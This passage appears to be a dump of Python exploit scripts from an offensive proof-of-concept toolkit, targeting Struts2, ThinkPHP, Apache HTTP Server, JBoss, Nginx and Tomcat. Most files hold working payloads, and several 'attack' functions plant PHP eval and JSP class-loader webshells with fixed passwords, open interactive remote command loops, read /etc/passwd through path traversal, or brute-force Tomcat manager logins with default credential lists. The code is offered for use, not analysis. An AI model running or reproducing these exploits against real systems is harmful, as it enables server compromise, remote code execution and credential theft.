| 'vulnerable': False 10 | } 11 | cmd = 'id' 12 | payload = "%25%7b(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27" + cmd + "%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d" 13 | ps = ['id', 'pid', 'name', 'uid', 'm', 'a'] 14 | try: 15 | for p in ps: 16 | payload = "/?{0}=".format(p) + payload 17 | vurl = urllib.parse.urljoin(url, payload) 18 | req = requests.get(vurl, timeout=3) 19 | if re.search(r'uid=.+ gid=.+ groups=.+', req.text): 20 | relsult['vulnerable'] = True 21 | relsult['url'] = url 22 | relsult['payload'] = vurl 23 | relsult['about'] = 'https://blog.csdn.net/qq_36197704/article/details/111226322' 24 | return relsult 25 | return relsult 26 | except: 27 | return relsult 28 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp2_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Thinkphp 2.x rce', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | try: 12 | payload = urllib.parse.urljoin(url, '/index.php?s=a/b/c/${var_dump(md5(1))}') 13 | response = requests.get(payload, timeout=3) 14 | if re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.text): 15 | relsult['vulnerable'] = True 16 | relsult['method'] = 'GET' 17 | relsult['url'] = url 18 | relsult['payload'] = payload 19 | relsult['attack'] = True 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | # getshell 25 | def attack(url): 26 | try: 27 | print('[*] 存在 Thinkphp 2.x rce!') 28 | payload = r'/index.php?s=a/b/c/${@print(eval($_POST[hk]))}' 29 | webshell = urllib.parse.urljoin(url, payload) 30 | if requests.get(webshell, timeout=10).status_code == 200: 31 | print('[+] webshell:', webshell) 32 | print('[+] 密码: hk') 33 | return True 34 | else: 35 | return False 36 | except: 37 | return False 38 | 39 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp32x_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, socket 3 | import urllib 4 | from urllib.parse import urlparse 5 | from datetime import date, timedelta 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'ThinkPHP3.2.x 远程代码执行', 10 | 'vulnerable': False, 11 | 'attack': True, 12 | } 13 | payload1 = b''' 14 | GET /index.php?m=--> HTTP/1.1 15 | Host: localhost:8080 16 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 17 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 18 | Accept-Language: en-GB,en;q=0.5 19 | Accept-Encoding: gzip, deflate 20 | Connection: close 21 | Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; 22 | Upgrade-Insecure-Requests: 1 23 | 24 | '''.replace(b'\n', b'\r\n') 25 | try: 26 | oH = urlparse(url) 27 | a = oH.netloc.split(':') 28 | port = 80 29 | if 2 == len(a): 30 | port = a[1] 31 | elif 'https' in oH.scheme: 32 | port = 443 33 | host = a[0] 34 | with socket.create_connection((host, port), timeout=5) as conn: 35 | conn.send(payload1) 36 | req1 = conn.recv(10240).decode() 37 | today = (date.today() + timedelta()).strftime("%y_%m_%d") 38 | payload2 = urllib.parse.urljoin(url, 'index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{0}.log'.format(today)) 39 | req2 = requests.get(payload2, timeout=3) 40 | if re.search(r'c4ca4238a0b923820dcc509a6f75849b', req2.text): 41 | relsult['vulnerable'] = True 42 | relsult['method'] = 'GET' 43 | relsult['url'] = url 44 | relsult['payload'] = payload2 45 | relsult['about'] = 'https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ,https://www.seebug.org/vuldb/ssvid-99297' 46 | return relsult 47 | except: 48 | return relsult 49 | 50 | 51 | def attack(url): 52 | payload1 = b'''GET /index.php?m=--> HTTP/1.1 53 | Host: localhost:8080 54 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 55 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 56 | Accept-Language: en-GB,en;q=0.5 57 | Accept-Encoding: gzip, deflate 58 | Connection: close 59 | Cookie: PHPSESSID=b6r46ojgc9tvdqpg9efrao7f66; 60 | Upgrade-Insecure-Requests: 1 61 | 62 | '''.replace(b'\n', b'\r\n') 63 | try: 64 | oH = urlparse(url) 65 | a = oH.netloc.split(':') 66 | port = 80 67 | if 2 == len(a): 68 | port = a[1] 69 | elif 'https' in oH.scheme: 70 | port = 443 71 | host = a[0] 72 | print('[+] 正在上传webshell.................') 73 | with socket.create_connection((host, port), timeout=5) as conn: 74 | conn.send(payload1) 75 | req1 = conn.recv(10240).decode() 76 | today = (date.today() + timedelta()).strftime("%y_%m_%d") 77 | payload2 = urllib.parse.urljoin(url, 'index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{0}.log'.format(today)) 78 | req2 = requests.get(payload2, timeout=3) 79 | if req2.status_code == 200: 80 | print('[*] webshell上传成功!') 81 | print('[*] Webshell地址: {0}'.format(payload2)) 82 | print('[*] 密码: a') 83 | print('[+] have a good day!') 84 | return True 85 | else: 86 | print('[-] webshell上传失败请检查是否存在漏洞?') 87 | return False 88 | except: 89 | return False 90 | 91 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp5022_5129.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | try: 12 | payload = urllib.parse.urljoin(url, r'''/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1''') 13 | response = requests.get(payload, timeout=3, verify=False) 14 | if re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.text): 15 | relsult['vulnerable'] = True 16 | relsult['method'] = 'GET' 17 | relsult['url'] = url 18 | relsult['payload'] = payload 19 | relsult['attack'] = True 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | # getshell 25 | def attack(url): 26 | basic_payload = url + r'''/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=''' 27 | if verify(url): 28 | print('[+] 存在 Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability') 29 | print('[+] 开始执行命令, 输入exit推出') 30 | cmd_shell = '' 31 | while cmd_shell != 'exit': 32 | cmd_shell = str(input('[+] 执行命令:')) 33 | payload = basic_payload + cmd_shell 34 | response = requests.get(payload, verify=False, timeout=3) 35 | print('[*] 执行结果:\n', response.text) 36 | return True 37 | else: 38 | return False 39 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp5023_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'ThinkPHP5 5.0.23 Remote Code Execution Vulnerability', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | try: 12 | target = url + '/index.php?s=captcha' 13 | target = urllib.parse.urljoin(url, '/index.php?s=captcha') 14 | payload = r'_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1' 15 | headers = { 16 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 17 | 'Content-Type': 'application/x-www-form-urlencoded', 18 | } 19 | response = requests.post(target, data=payload, timeout=3, verify=False, headers=headers) 20 | response2 = requests.post(target, timeout=3, verify=False, headers=headers) 21 | if re.search(r'PHP Version', response.text) and not re.search(r'PHP Version', response2.text): 22 | relsult['vulnerable'] = True 23 | relsult['method'] = 'POST' 24 | relsult['url'] = target 25 | relsult['position'] = 'data' 26 | relsult['payload'] = payload 27 | relsult['attack'] = True 28 | return relsult 29 | except: 30 | return relsult 31 | 32 | # getshell 33 | def attack(url): 34 | if verify(url): 35 | print('[+] 存在 ThinkPHP5 5.0.23 Remote Code Execution Vulnerability') 36 | target = url + '/index.php?s=captcha' 37 | basic_payload = '_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]={0}' 38 | headers = { 39 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 40 | 'Content-Type': 'application/x-www-form-urlencoded', 41 | } 42 | cmd_shell = '' 43 | print('[+] 开始执行命令, 输入exit退出') 44 | while cmd_shell != 'exit': 45 | cmd_shell = str(input('[+] 执行命令: ')) 46 | payload = basic_payload.format(cmd_shell) 47 | response = requests.post(target, data=payload, headers=headers, timeout=3, verify=False) 48 | output = re.search(r'([^<]*)', response.text)[0] 49 | print('[*] 执行结果结果:', response.text) 50 | return True 51 | else: 52 | return False 53 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp5_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = urllib.parse.urljoin(url, '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1') 12 | response = requests.get(payload, timeout=3, verify=False) 13 | if re.search(r'XPATH syntax error', response.text): 14 | relsult['vulnerable'] = True 15 | relsult['method'] = 'GET' 16 | relsult['url'] = url 17 | relsult['payload'] = payload 18 | return relsult 19 | except: 20 | return relsult 21 | 22 | # 只能爆出用户名密码(不能子查询) 23 | def exp(): 24 | url = input('输入目标URL:') 25 | if verify(url): 26 | print('[+] 存在 ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability') 27 | payload = url + r'/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1' 28 | response = requests.get(payload, timeout=3, verify=False) 29 | user = re.findall(r"XPATH syntax error: '
\n([^']*)'", response.text)[0] 30 | print('[+] 数据库用户:', user) 31 | 32 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_driver_display_rce.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import requests 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'thinkphp_driver_display_rce', 8 | 'vulnerable': False 9 | } 10 | headers = { 11 | "User-Agent" : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 12 | } 13 | try: 14 | vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E') 15 | req = requests.get(vurl, headers=headers, timeout=15, verify=False) 16 | if r"56540676a129760a" in req.text: 17 | relsult['vulnerable'] = True 18 | relsult['url'] = url 19 | relsult['method'] = 'GET' 20 | relsult['payload'] = vurl 21 | return relsult 22 | except: 23 | return relsult -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_index_construct_rce.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import requests 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'thinkphp_index_construct_rce', 8 | 'vulnerable': False 9 | } 10 | headers = { 11 | "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 12 | "Content-Type": "application/x-www-form-urlencoded", 13 | } 14 | payload = 's=4e5e5d7364f443e28fbf0d3ae744a59a&_method=__construct&method&filter[]=var_dump' 15 | try: 16 | vurl = urllib.parse.urljoin(url, 'index.php?s=index/index/index') 17 | req = requests.post(vurl, data=payload, headers=headers, timeout=15, verify=False) 18 | if r"4e5e5d7364f443e28fbf0d3ae744a59a" in req.text and 'var_dump' not in req.text: 19 | relsult['vulnerable'] = True 20 | relsult['method'] = 'POST' 21 | relsult['url'] = vurl 22 | relsult['position'] = 'data' 23 | relsult['payload'] = payload 24 | return relsult 25 | except: 26 | return relsult 27 | 28 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_index_showid_rce.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import datetime 3 | import requests 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'thinkphp_index_showid_rce', 9 | 'vulnerable': False 10 | } 11 | headers = { 12 | "User-Agent" : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 13 | } 14 | try: 15 | vurl = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~var_dump(md5(2333))}]') 16 | req = requests.get(vurl, headers=headers, timeout=15, verify=False) 17 | timenow = datetime.datetime.now().strftime("%Y_%m_%d")[2:] 18 | vurl2 = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C{0}.log'.format(timenow)) 19 | req2 = requests.get(vurl2, headers=headers, timeout=15, verify=False) 20 | if r"56540676a129760a3" in req2.text: 21 | relsult['vulnerable'] = True 22 | relsult['method'] = 'GET' 23 | relsult['url'] = vurl 24 | relsult['payload'] = vurl2 25 | return relsult 26 | except: 27 | return relsult 28 | -------------------------------------------------------------------------------- /pocs/framework/thinkphp/thinkphp_invoke_func_code_exec.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib 3 | import requests 4 | 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'thinkphp_invoke_func_code_exec', 9 | 'vulnerable': False 10 | } 11 | headers = { 12 | "User-Agent" : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 13 | } 14 | controllers = list() 15 | try: 16 | req = requests.get(url, headers=headers, timeout=15, verify=False) 17 | except: 18 | return relsult 19 | pattern = ' 25 | 26 | -----------------------------153388130435749919031880185481 27 | Content-Disposition: form-data; name="name" 28 | 29 | testing.php 30 | 31 | -----------------------------153388130435749919031880185481--''' 32 | 33 | try: 34 | respond = requests.post(url, headers=headers,data=data, timeout=3) 35 | v = requests.get(url + filename, timeout=3) 36 | if respond.status_code == 200 and re.search('PHP Version', v.text) and v.status_code == 200: 37 | relsult['vulnerable'] = True 38 | relsult['url'] = url 39 | relsult['verify'] = url + filename 40 | relsult['about'] = 'https://www.cnblogs.com/confidant/p/15460396.html, https://vulhub.org/#/environments/httpd/CVE-2017-15715/' 41 | return relsult 42 | else: 43 | return relsult 44 | except: 45 | return relsult 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /pocs/middleware/apache/CVE_2021_41773.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | import urllib.request 5 | import ssl 6 | from colorama import init 7 | 8 | def verify(url): 9 | relsult = { 10 | 'name': 'Apache HTTP Server Arbitrary File Read(CVE-2021-41773)', 11 | 'vulnerable': False 12 | } 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36', 15 | } 16 | 17 | payload = '/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd' 18 | # 防止ssl报错 19 | context = ssl._create_unverified_context() 20 | vurl = urllib.parse.urljoin(url, payload) 21 | try: 22 | re = urllib.request.Request(url=vurl, headers=headers) 23 | response = urllib.request.urlopen(re, context=context, timeout=3) 24 | response = response.read().decode('utf-8') 25 | if "root:x:" in str(response): 26 | relsult['vulnerable'] = True 27 | relsult['url'] = url 28 | relsult['vulurl'] = vurl 29 | relsult['about'] = 'https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013' 30 | return relsult 31 | else: 32 | return relsult 33 | except: 34 | return relsult 35 | 36 | 37 | -------------------------------------------------------------------------------- /pocs/middleware/apache/CVE_2021_42013.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | from urllib import request 5 | import time 6 | import socket 7 | from urllib.parse import urlparse 8 | 9 | def verify(url): 10 | relsult = { 11 | 'name': ' Apache HTTP Server 2.4.50 远程代码执行漏洞(CVE-2021-42013)', 12 | 'vulnerable': False, 13 | 'attack': True, 14 | } 15 | 16 | cmd = 'echo 9304c2d1af7a21f56830c7ba773a93e2 | base64' 17 | 18 | # 防止ssl报错 19 | p = b''' 20 | POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 21 | Host: localhost:8080 22 | Accept-Encoding: identity 23 | Content-Type: application/text 24 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 25 | Content-Length: 51 26 | 27 | '''.replace(b'\n', b'\r\n') 28 | payload = 'echo;{0}\n'.format(cmd) 29 | payload = bytes(payload, 'utf-8') 30 | payload = payload.replace(b'\n', b'\r\n') 31 | 32 | try: 33 | oH = urlparse(url) 34 | a = oH.netloc.split(':') 35 | port = 80 36 | if 2 == len(a): 37 | port = a[1] 38 | elif 'https' in oH.scheme: 39 | port = 443 40 | host = a[0] 41 | with socket.create_connection((host, port), timeout=5) as conn: 42 | conn.send(p + payload) 43 | time.sleep(2) 44 | rep = conn.recv(10240).decode() 45 | if re.search("OTMwNGMyZDFhZjdhMjFmNTY4MzBjN2JhNzczYTkzZTIK", rep): 46 | relsult['vulnerable'] = True 47 | relsult['url'] = url 48 | relsult['about'] = 'https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013' 49 | return relsult 50 | else: 51 | return relsult 52 | except: 53 | return relsult 54 | 55 | def attack(url): 56 | try: 57 | payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' 58 | vurl = urllib.parse.urljoin(url, payload) 59 | post_data = 'echo;{0}' 60 | cmd = '' 61 | print('[+] 开始执行命令, 输入exit退出!') 62 | while cmd != 'exit': 63 | post_data = 'echo;{0}' 64 | cmd = str(input('[+] 执行命令:')) 65 | post_data = bytes(post_data.format(cmd), 'utf-8') 66 | with request.urlopen(vurl, data=post_data) as response: 67 | data = response.read() 68 | print('[*] 执行结果:') 69 | print(data.decode('utf-8')) 70 | return True 71 | except: 72 | return False 73 | 74 | 75 | -------------------------------------------------------------------------------- /pocs/middleware/jboss/CVE_2017_12149.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Jboss反序列化漏洞 (CVE-2017-12149)', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = '/invoker/readonly' 12 | vurl = urllib.parse.urljoin(url, payload) 13 | req = requests.get(vurl, timeout=3) 14 | if req.status_code == 500 and re.search('jboss', req.text): 15 | relsult['vulnerable'] = True 16 | relsult['url'] = url 17 | relsult['method'] = 'GET' 18 | relsult['payload'] = vurl 19 | relsult['about'] = 'https://github.com/yunxu1/jboss-_CVE-2017-12149' 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | 25 | -------------------------------------------------------------------------------- /pocs/middleware/jboss/CVE_2017_7501.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Jboss反序列化漏洞 (CVE-2017-7501)', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = '/invoker/JMXInvokerServlet' 12 | vurl = urllib.parse.urljoin(url, payload) 13 | req = requests.get(vurl, timeout=3) 14 | if req.status_code == 200 and re.search(r'jboss', req.text) and re.search(r'java', req.text): 15 | relsult['vulnerable'] = True 16 | relsult['url'] = url 17 | relsult['method'] = 'GET' 18 | relsult['payload'] = vurl 19 | relsult['about'] = 'https://github.com/ggyao/jbossscan, https://github.com/joaomatosf/JavaDeserH2HC' 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | -------------------------------------------------------------------------------- /pocs/middleware/jboss/CVE_2017_7504.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Jboss反序列化漏洞 (CVE-2017-7504)', 8 | 'vulnerable': False 9 | } 10 | try: 11 | payload = '/jbossmq-httpil/HTTPServerILServlet' 12 | vurl = urllib.parse.urljoin(url, payload) 13 | req = requests.get(vurl, timeout=3) 14 | if req.status_code == 200 and re.search('This is the JBossMQ HTTP-IL', req.text): 15 | relsult['vulnerable'] = True 16 | relsult['url'] = url 17 | relsult['method'] = 'GET' 18 | relsult['payload'] = vurl 19 | relsult['about'] = 'https://github.com/ggyao/jbossscan, https://github.com/joaomatosf/JavaDeserH2HC' 20 | return relsult 21 | except: 22 | return relsult 23 | 24 | -------------------------------------------------------------------------------- /pocs/middleware/nginx/nginx_parsing_vulnerability.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Nginx 解析漏洞', 8 | 'vulnerable': False 9 | } 10 | headers = { 11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 12 | } 13 | try: 14 | rep = requests.get(url, headers=headers) 15 | vurl1 = url + '/.php' 16 | vurl2 = url + '/.xxx' 17 | vurl3 = url + '/.a' 18 | rep1 = requests.get(vurl1, headers=headers) 19 | rep2 = requests.get(vurl2, headers=headers) 20 | rep3 = requests.get(vurl3, headers=headers) 21 | if 'nginx' in str(rep.headers): 22 | if len(rep1.text) != len(rep2.text) and len(rep1.text) != len(rep3.text) and len(rep2.text) == len(rep3.text): 23 | relsult['vulnerable'] = True 24 | relsult['url'] = url 25 | relsult['payload'] = vurl1 26 | relsult['about'] = 'https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/' 27 | return relsult 28 | except: 29 | return relsult -------------------------------------------------------------------------------- /pocs/middleware/tomcat/CVE_2017_12615.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import re, random, string 4 | 5 | 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)', 10 | 'vulnerable': False, 11 | 'attack': True, 12 | } 13 | headers = { 14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 15 | } 16 | try: 17 | rand_filename = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.txt' 18 | rand_str = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)) 19 | vurl = urllib.parse.urljoin(url, rand_filename) 20 | requests.put(vurl, data=rand_str, timeout=3, headers=headers) 21 | rep = requests.get(vurl, timeout=3, headers=headers) 22 | if rep.status_code == 200 and re.search(rand_str, rep.text): 23 | relsult['vulnerable'] = True 24 | relsult['url'] = url 25 | relsult['verify'] = vurl 26 | relsult['about'] = 'https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md' 27 | relsult['attack'] = True 28 | return relsult 29 | except: 30 | return relsult 31 | 32 | 33 | def attack(url): 34 | try: 35 | headers = { 36 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 37 | } 38 | shell = ''' 39 | <%! 40 | class U extends ClassLoader { 41 | U(ClassLoader c) { 42 | super(c); 43 | } 44 | public Class g(byte[] b) { 45 | return super.defineClass(b, 0, b.length); 46 | } 47 | } 48 | 49 | public byte[] base64Decode(String str) throws Exception { 50 | try { 51 | Class clazz = Class.forName("sun.misc.BASE64Decoder"); 52 | return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); 53 | } catch (Exception e) { 54 | Class clazz = Class.forName("java.util.Base64"); 55 | Object decoder = clazz.getMethod("getDecoder").invoke(null); 56 | return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); 57 | } 58 | } 59 | %> 60 | <% 61 | String cls = request.getParameter("pocbomber"); 62 | if (cls != null) { 63 | new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); 64 | } 65 | %>''' 66 | print('[+] hacking ......') 67 | shell_name = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.jsp/' 68 | vurl = urllib.parse.urljoin(url, shell_name) 69 | requests.put(vurl, data=shell, timeout=3, headers=headers) 70 | webshell = vurl.rstrip('/') 71 | rep = requests.get(webshell, timeout=5, headers=headers) 72 | if rep.status_code == 200: 73 | print('[*] 蚁剑shell上传成功!') 74 | print('[*] shell地址: ' + webshell) 75 | print('[*] 密码: pocbomber') 76 | return True 77 | else: 78 | print('[-] shell上传失败') 79 | return False 80 | except: 81 | return False 82 | 83 | -------------------------------------------------------------------------------- /pocs/middleware/tomcat/tomcat.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tr0uble-mAker/POC-bomber/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/middleware/tomcat/tomcat.war -------------------------------------------------------------------------------- /pocs/middleware/tomcat/tomcat_weakpass_getshell.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | import base64 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Tomcat 弱口令(上传war包getshell)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | tomcat_users = ['tomcat', 'admin'] 12 | tomcat_passwds = ['tomcat', 'admin', '123456', ''] 13 | try: 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', 16 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 17 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 18 | 'Accept-Encoding': 'gzip, deflate', 19 | 'Authorization': '', 20 | } 21 | vurl = urllib.parse.urljoin(url, '/manager/html') 22 | rep = requests.get(vurl, timeout=3) 23 | if re.search('tomcat', rep.text) and 'Apache' in str(rep.headers) and rep.status_code == 401: 24 | for tomcat_user in tomcat_users: 25 | for tomcat_passwd in tomcat_passwds: 26 | auth = '{0}:{1}'.format(tomcat_user, tomcat_passwd) 27 | base64_auth = base64.b64encode(auth.encode('utf-8')).decode('utf-8') 28 | headers['Authorization'] = 'Basic {0}'.format(base64_auth) 29 | verify_rep = requests.get(vurl, headers=headers, timeout=2) 30 | if verify_rep.status_code == 200 and 'Set-Cookie' in str(verify_rep.headers): 31 | relsult['vulnerable'] = True 32 | relsult['url'] = url 33 | relsult['vurl'] = vurl 34 | relsult['user'] = tomcat_user 35 | relsult['password'] = tomcat_passwd 36 | relsult['about'] = 'https://www.cnblogs.com/-chenxs/p/11647246.html' 37 | return relsult 38 | return relsult 39 | except: 40 | return relsult 41 | 42 | 43 | def attack(url): 44 | try: 45 | session = requests.Session() 46 | tomcat_user = input('[+] 输入tomcat用户名:') 47 | tomcat_passwd = input('[+] 输入tomcat密码:') 48 | headers = { 49 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', 50 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 51 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 52 | 'Accept-Encoding': 'gzip, deflate', 53 | 'Authorization': '', 54 | } 55 | auth = '{0}:{1}'.format(tomcat_user, tomcat_passwd) 56 | base64_auth = base64.b64encode(auth.encode('utf-8')).decode('utf-8') 57 | headers['Authorization'] = 'Basic {0}'.format(base64_auth) 58 | vurl = urllib.parse.urljoin(url, '/manager/html') 59 | verify_rep = session.get(vurl, headers=headers, timeout=3) 60 | if verify_rep.status_code == 200 and 'Set-Cookie' in str(verify_rep.headers): 61 | print('[+] tomcat登录成功!') 62 | print('[+] 获取到: {0}'.format(verify_rep.headers['Set-Cookie'])) 63 | print('[+] tomcat后台getshell步骤') 64 | print('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=') 65 | print('| 1.在后台将文件 /pocs/middleware/tomcat/tomcat.war 上传 |') 66 | print('| 2.上传成功后在 根目录下的 /tomcat/test.jsp 可以访问到webshell! |') 67 | print('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=') 68 | print('[+] 注意: 在将war包上传后访问') 69 | print('[*] webshell地址(蚁剑): 